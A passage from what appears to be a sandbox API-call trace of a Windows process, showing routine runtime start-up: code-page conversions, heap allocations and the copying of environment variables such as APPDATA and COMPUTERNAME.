(dwErrCode=0x0) [0064.088] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0064.088] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x18e338, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0064.096] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0064.096] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e128, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0064.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18e8f8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ°)n\x8b4ë\x18", lpUsedDefaultChar=0x0) returned 256 [0064.097] GetLastError () returned 0x0 [0064.097] SetLastError (dwErrCode=0x0) [0064.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0064.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x18e348, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0064.097] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0064.097] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e138, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0064.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e7f8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ°)n\x8b4ë\x18", lpUsedDefaultChar=0x0) returned 256 [0064.105] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0064.105] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x40636c [0064.163] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x710db8) returned 0x80 [0064.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0064.192] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1f) returned 0x70f090 [0064.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x70f090, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0064.201] GetLastError () returned 0x0 [0064.201] SetLastError (dwErrCode=0x0) [0064.201] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x4) returned 0x711068 [0064.201] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711068) returned 0x4 [0064.201] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711068, Size=0x8) returned 0x711068 [0064.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0064.202] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x36) returned 0x711078 [0064.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x711078, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0064.202] GetLastError () returned 0x0 [0064.202] SetLastError (dwErrCode=0x0) [0064.202] GetLastError () returned 0x0 [0064.202] SetLastError (dwErrCode=0x0) [0064.202] GetLastError () returned 0x0 [0064.202] SetLastError (dwErrCode=0x0) [0064.210] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711068) returned 0x8 [0064.210] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711068, Size=0xc) returned 0x7110b8 [0064.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0064.210] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x37) returned 0x7110d0 [0064.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x7110d0, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0064.210] GetLastError () returned 0x0 [0064.210] SetLastError (dwErrCode=0x0) [0064.211] GetLastError () returned 0x0 [0064.211] SetLastError (dwErrCode=0x0) [0064.211] GetLastError () returned 0x0 [0064.211] SetLastError (dwErrCode=0x0) [0064.211] GetLastError () returned 0x0 [0064.211] SetLastError (dwErrCode=0x0) [0064.211] GetLastError () returned 0x0 [0064.211] SetLastError (dwErrCode=0x0) [0064.211] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7110b8) returned 0xc [0064.211] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7110b8, Size=0x10) returned 0x7110b8 [0064.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0064.211] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3c) returned 0x704f38 [0064.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x704f38, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0064.211] GetLastError () returned 0x0 [0064.211] SetLastError (dwErrCode=0x0) [0064.211] GetLastError () returned 0x0 [0064.211] SetLastError (dwErrCode=0x0) [0064.211] GetLastError () returned 0x0 [0064.211] SetLastError (dwErrCode=0x0) [0064.211] GetLastError () returned 0x0 [0064.211] SetLastError (dwErrCode=0x0) [0064.211] GetLastError () returned 0x0 [0064.211] SetLastError (dwErrCode=0x0) [0064.211] GetLastError () returned 0x0 [0064.211] SetLastError (dwErrCode=0x0) [0064.212] GetLastError () returned 0x0 [0064.212] SetLastError (dwErrCode=0x0) [0064.212] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7110b8) returned 0x10 [0064.212] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7110b8, Size=0x14) returned 0x711110 [0064.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0064.212] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x31) returned 0x711130 [0064.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x711130, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0064.212] GetLastError () returned 0x0 [0064.212] SetLastError (dwErrCode=0x0) [0064.212] GetLastError () returned 0x0 [0064.212] SetLastError (dwErrCode=0x0) [0064.212] GetLastError () returned 0x0 [0064.212] SetLastError (dwErrCode=0x0) [0064.212] GetLastError () returned 0x0 [0064.212] SetLastError (dwErrCode=0x0) [0064.212] GetLastError () returned 0x0 [0064.212] SetLastError (dwErrCode=0x0) [0064.212] GetLastError () returned 0x0 [0064.212] SetLastError (dwErrCode=0x0) [0064.212] GetLastError () returned 0x0 [0064.212] SetLastError (dwErrCode=0x0) [0064.212] GetLastError () returned 0x0 [0064.212] SetLastError (dwErrCode=0x0) [0064.212] GetLastError () returned 0x0 [0064.213] SetLastError (dwErrCode=0x0) [0064.213] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711110) returned 0x14 [0064.213] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711110, Size=0x18) returned 0x711110 [0064.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0064.213] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x17) returned 0x711170 [0064.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x711170, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0064.213] GetLastError () returned 0x0 [0064.213] SetLastError (dwErrCode=0x0) [0064.213] GetLastError () returned 0x0 [0064.213] SetLastError (dwErrCode=0x0) [0064.213] GetLastError () returned 0x0 [0064.213] SetLastError (dwErrCode=0x0) [0064.213] GetLastError () returned 0x0 [0064.213] SetLastError (dwErrCode=0x0) [0064.213] GetLastError () returned 0x0 [0064.213] SetLastError (dwErrCode=0x0) [0064.213] GetLastError () returned 0x0 [0064.213] SetLastError (dwErrCode=0x0) [0064.213] GetLastError () returned 0x0 [0064.213] SetLastError (dwErrCode=0x0) [0064.213] GetLastError () returned 0x0 [0064.213] SetLastError (dwErrCode=0x0) [0064.213] GetLastError () returned 0x0 [0064.213] SetLastError (dwErrCode=0x0) [0064.213] GetLastError () returned 0x0 [0064.214] SetLastError (dwErrCode=0x0) [0064.214] GetLastError () returned 0x0 [0064.214] SetLastError (dwErrCode=0x0) [0064.214] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711110) returned 0x18 [0064.214] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711110, Size=0x1c) returned 0x711190 [0064.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0064.214] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x70aa10 [0064.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x70aa10, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0064.214] GetLastError () returned 0x0 [0064.214] SetLastError (dwErrCode=0x0) [0064.214] GetLastError () returned 0x0 [0064.214] SetLastError (dwErrCode=0x0) [0064.214] GetLastError () returned 0x0 [0064.214] SetLastError (dwErrCode=0x0) [0064.214] GetLastError () returned 0x0 [0064.214] SetLastError (dwErrCode=0x0) [0064.214] GetLastError () returned 0x0 [0064.214] SetLastError (dwErrCode=0x0) [0064.214] GetLastError () returned 0x0 [0064.214] SetLastError (dwErrCode=0x0) [0064.214] GetLastError () returned 0x0 [0064.214] SetLastError (dwErrCode=0x0) [0064.214] GetLastError () returned 0x0 [0064.214] SetLastError (dwErrCode=0x0) [0064.214] GetLastError () returned 0x0 [0064.215] SetLastError (dwErrCode=0x0) [0064.215] GetLastError () returned 0x0 [0064.215] SetLastError (dwErrCode=0x0) [0064.215] GetLastError () returned 0x0 [0064.215] SetLastError (dwErrCode=0x0) [0064.215] GetLastError () returned 0x0 [0064.215] SetLastError (dwErrCode=0x0) [0064.215] GetLastError () returned 0x0 [0064.215] SetLastError (dwErrCode=0x0) [0064.215] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711190) returned 0x1c [0064.215] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711190, Size=0x20) returned 0x711190 [0064.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0064.215] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x14) returned 0x711110 [0064.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x711110, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0064.215] GetLastError () returned 0x0 [0064.215] SetLastError (dwErrCode=0x0) [0064.215] GetLastError () returned 0x0 [0064.215] SetLastError (dwErrCode=0x0) [0064.215] GetLastError () returned 0x0 [0064.215] SetLastError (dwErrCode=0x0) [0064.215] GetLastError () returned 0x0 [0064.215] SetLastError (dwErrCode=0x0) [0064.215] GetLastError () returned 0x0 [0064.215] SetLastError (dwErrCode=0x0) [0064.215] GetLastError () returned 0x0 [0064.216] SetLastError (dwErrCode=0x0) [0064.216] GetLastError () returned 0x0 [0064.216] SetLastError (dwErrCode=0x0) [0064.216] GetLastError () returned 0x0 [0064.216] SetLastError (dwErrCode=0x0) [0064.216] GetLastError () returned 0x0 [0064.216] SetLastError (dwErrCode=0x0) [0064.216] GetLastError () returned 0x0 [0064.216] SetLastError (dwErrCode=0x0) [0064.216] GetLastError () returned 0x0 [0064.216] SetLastError (dwErrCode=0x0) [0064.216] GetLastError () returned 0x0 [0064.216] SetLastError (dwErrCode=0x0) [0064.216] GetLastError () returned 0x0 [0064.216] SetLastError (dwErrCode=0x0) [0064.216] GetLastError () returned 0x0 [0064.216] SetLastError (dwErrCode=0x0) [0064.216] GetLastError () returned 0x0 [0064.216] SetLastError (dwErrCode=0x0) [0064.216] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711190) returned 0x20 [0064.216] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711190, Size=0x24) returned 0x711190 [0064.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0064.216] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xd) returned 